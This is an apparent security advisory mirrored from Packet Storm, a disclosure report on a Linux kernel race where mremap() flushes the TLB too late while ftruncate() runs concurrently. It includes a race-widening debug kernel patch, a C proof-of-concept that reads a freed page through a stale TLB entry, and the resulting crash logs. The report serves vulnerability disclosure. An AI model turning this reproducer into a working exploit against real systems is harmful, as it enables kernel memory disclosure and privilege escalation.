Lucene search

packetstormJann HornPACKETSTORM:150001
HistoryOct 29, 2018 - 12:00 a.m.

Linux mremap() TLB Flush Too Late

Jann Horn





Linux: mremap() TLB flush too late with concurrent ftruncate()   
Tested on the master branch (4.19.0-rc7+).  
sys_mremap() takes current->mm->mmap_sem for writing, then calls  
mremap_to()->move_vma()->move_page_tables(). move_page_tables() first  
calls move_ptes() (which takes PTE locks, moves PTEs, and drops PTE  
locks) in a loop, then performs a TLB flush with flush_tlb_range().  
move_ptes() can also perform TLB flushes, but only when dirty PTEs are  
encountered - non-dirty, accessed PTEs don't trigger such early flushes.  
Between the move_ptes() loop and the TLB flush, the only lock being  
held in move_page_tables() is current->mm->mmap_sem.  
sys_ftruncate()->...->zap_page_range_single() can concurrently access  
the page tables of a process that is in move_page_tables(), between  
the move_ptes() loop and the TLB flush.  
The following race can occur in a process with three threads A, B and C:  
A: maps a file of size 0x1000 at address X, with PROT_READ and MAP_SHARED  
C: starts reading from address X in a busyloop  
A: starts an mremap() call that remaps from X to Y; syscall progresses  
until directly before the flush_tlb_range() call in move_page_tables()  
[at this point, the PTE for X is gone, but C still has a read-only TLB  
entry for X; the PTE for Y has been created]  
B: uses sys_ftruncate() to change the file size to zero. This removes  
the PTE for address Y, then sends a TLB flush IPI *for address Y*.  
TLB entries *for address X* stay alive.  
The kernel now assumes that the page is not referenced by any  
userspace task anymore, but actually, thread C can still use the stale  
TLB entry at address X to read from it.  
At this point, the page can be freed as soon as it disappears from the  
LRU list (which I don't really understand); it looks like there are  
various kernel interfaces that can be used to trigger  
lru_add_drain_all(). For simplicity, I am using root privileges to  
write to /proc/sys/vm/compact_memory in order to trigger this.  
To test this, I configured my kernel with PAGE_TABLE_ISOLATION=n,  
CONFIG_PREEMPT=y, CONFIG_PAGE_POISONING=y, and used the kernel  
commandline flag "page_poison=1". I patched the kernel as follows to  
widen the race window (and make debugging easier). A copy of the patch  
is attached.  
diff --git a/arch/x86/mm/tlb.c b/arch/x86/mm/tlb.c  
index e96b99eb800c..8156628a6204 100644  
--- a/arch/x86/mm/tlb.c  
+++ b/arch/x86/mm/tlb.c  
@@ -567,6 +567,11 @@ static void flush_tlb_func_remote(void *info)  
if (f->mm && f->mm != this_cpu_read(cpu_tlbstate.loaded_mm))  
+ if (strcmp(current->comm, "race2") == 0) {  
+ pr_warn("remotely-triggered TLB shootdown: start=0x%lx end=0x%lx\n",  
+ f->start, f->end);  
+ }  
flush_tlb_func_common(f, false, TLB_REMOTE_SHOOTDOWN);  
diff --git a/mm/compaction.c b/mm/compaction.c  
index faca45ebe62d..27594b4868ec 100644  
--- a/mm/compaction.c  
+++ b/mm/compaction.c  
@@ -1852,11 +1852,15 @@ static void compact_nodes(void)  
int nid;  
+ pr_warn("compact_nodes entry\n");  
/* Flush pending updates to the LRU lists */  
+ pr_warn("compact_nodes exit\n");  
/* The written value is actually unused, all memory is compacted */  
diff --git a/mm/mremap.c b/mm/mremap.c  
index 5c2e18505f75..be34e0a7258e 100644  
--- a/mm/mremap.c  
+++ b/mm/mremap.c  
@@ -186,6 +186,7 @@ static void move_ptes(struct vm_area_struct *vma, pmd_t *old_pmd,  
flush_tlb_range(vma, old_end - len, old_end);  
*need_flush = true;  
pte_unmap_unlock(old_pte - 1, old_ptl);  
if (need_rmap_locks)  
@@ -248,8 +249,18 @@ unsigned long move_page_tables(struct vm_area_struct *vma,  
move_ptes(vma, old_pmd, old_addr, old_addr + extent, new_vma,  
new_pmd, new_addr, need_rmap_locks, &need_flush);  
- if (need_flush)  
+ if (need_flush) {  
+ if (strcmp(current->comm, "race") == 0) {  
+ int i;  
+ pr_warn("spinning before flush\n");  
+ for (i=0; i<100000000; i++) barrier();  
+ pr_warn("spinning before flush done\n");  
+ }  
flush_tlb_range(vma, old_end-len, old_addr);  
+ if (strcmp(current->comm, "race") == 0) {  
+ pr_warn("flush done\n");  
+ }  
+ }  
mmu_notifier_invalidate_range_end(vma->vm_mm, mmun_start, mmun_end);  
diff --git a/mm/page_poison.c b/mm/page_poison.c  
index aa2b3d34e8ea..5ffe8b998573 100644  
--- a/mm/page_poison.c  
+++ b/mm/page_poison.c  
@@ -34,6 +34,10 @@ static void poison_page(struct page *page)  
void *addr = kmap_atomic(page);  
+ if (*(unsigned long *)addr == 0x4141414141414141UL) {  
+ }  
memset(addr, PAGE_POISON, PAGE_SIZE);  
diff --git a/mm/shmem.c b/mm/shmem.c  
index 446942677cd4..838b5f77cc0e 100644  
--- a/mm/shmem.c  
+++ b/mm/shmem.c  
@@ -1043,6 +1043,11 @@ static int shmem_setattr(struct dentry *dentry, struct iattr *attr)  
if (newsize <= oldsize) {  
loff_t holebegin = round_up(newsize, PAGE_SIZE);  
+ if (strcmp(current->comm, "race") == 0) {  
+ pr_warn("shmem_setattr entry\n");  
+ }  
if (oldsize > holebegin)  
holebegin, 0, 1);  
@@ -1054,6 +1059,10 @@ static int shmem_setattr(struct dentry *dentry, struct iattr *attr)  
holebegin, 0, 1);  
+ if (strcmp(current->comm, "race") == 0) {  
+ pr_warn("shmem_setattr exit\n");  
+ }  
* Part of the huge page can be beyond i_size: subject  
* to shrink under memory pressure.  
Then, I ran the following testcase a few times (compile with  
"gcc -O2 -o race race.c -pthread"; note that the filename matters for  
the kernel patch):  
#define _GNU_SOURCE  
#include <pthread.h>  
#include <stdio.h>  
#include <fcntl.h>  
#include <err.h>  
#include <unistd.h>  
#include <string.h>  
#include <sys/mman.h>  
#include <sys/prctl.h>  
#define ul unsigned long  
static int alloc_fd = -1;  
#define allocptr ((ul *)0x100000000000)  
#define allocptr2 ((ul *)0x100000002000)  
void *reader_fn(void *dummy) {  
prctl(PR_SET_NAME, "race2");  
while (1) {  
ul x = *(volatile ul *)allocptr;  
if (x != 0x4141414141414141UL) {  
printf("GOT 0x%016lx\n", x);  
void *truncate_fn(void *dummy) {  
if (ftruncate(alloc_fd, 0)) err(1, "ftruncate");  
int sysctl_fd = open("/proc/sys/vm/compact_memory", O_WRONLY);  
if (sysctl_fd == -1) err(1, "unable to open sysctl");  
write(sysctl_fd, "1", 1);  
return 0;  
int main(void) {  
alloc_fd = open("/dev/shm/race_demo", O_RDWR|O_CREAT|O_TRUNC, 0600);  
if (alloc_fd == -1) err(1, "open");  
char buf[0x1000];  
memset(buf, 0x41, sizeof(buf));  
if (write(alloc_fd, buf, sizeof(buf)) != sizeof(buf)) err(1, "write");  
if (mmap(allocptr, 0x1000, PROT_READ, MAP_SHARED, alloc_fd, 0) != allocptr) err(1, "mmap");  
pthread_t reader;  
if (pthread_create(&reader, NULL, reader_fn, NULL)) errx(1, "thread");  
pthread_t truncator;  
if (pthread_create(&truncator, NULL, truncate_fn, NULL)) err(1, "thread2");  
if (mremap(allocptr, 0x1000, 0x1000, MREMAP_FIXED|MREMAP_MAYMOVE, allocptr2) != allocptr2) err(1, "mremap");  
return 0;  
After a few attempts, I get the following output:  
user@debian:~/mremap_ftruncate_race$ sudo ./race  
GOT 0xaaaaaaaaaaaaaaaa  
Segmentation fault  
Note that 0xaaaaaaaaaaaaaaaa is PAGE_POISON.  
dmesg reports:  
shmem_setattr entry  
shmem_setattr exit  
spinning before flush  
shmem_setattr entry  
remotely-triggered TLB shootdown: start=0x100000002000 end=0x100000003000  
shmem_setattr exit  
compact_nodes entry  
------------[ cut here ]------------  
WARNING: CPU: 5 PID: 1334 at mm/page_poison.c:38 kernel_poison_pages+0x10a/0x180  
Modules linked in: btrfs xor zstd_compress raid6_pq  
CPU: 5 PID: 1334 Comm: kworker/5:1 Tainted: G W 4.19.0-rc7+ #188  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014  
Workqueue: mm_percpu_wq lru_add_drain_per_cpu  
RIP: 0010:kernel_poison_pages+0x10a/0x180  
Call Trace:  
? __mod_zone_page_state+0x66/0xa0  
? pagevec_move_tail_fn+0x2b0/0x2b0  
? process_one_work+0x400/0x400  
? kthread_create_worker_on_cpu+0x70/0x70  
---[ end trace aed8d7b167ea0097 ]---  
compact_nodes exit  
spinning before flush done  
flush done  
race2[1430]: segfault at 100000000000 ip 000055f56e711b98 sp 00007f02d7823f40 error 4 in race[55f56e711000+1000]  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available (whichever is earlier), the bug  
report will become visible to the public.  
Found by: jannh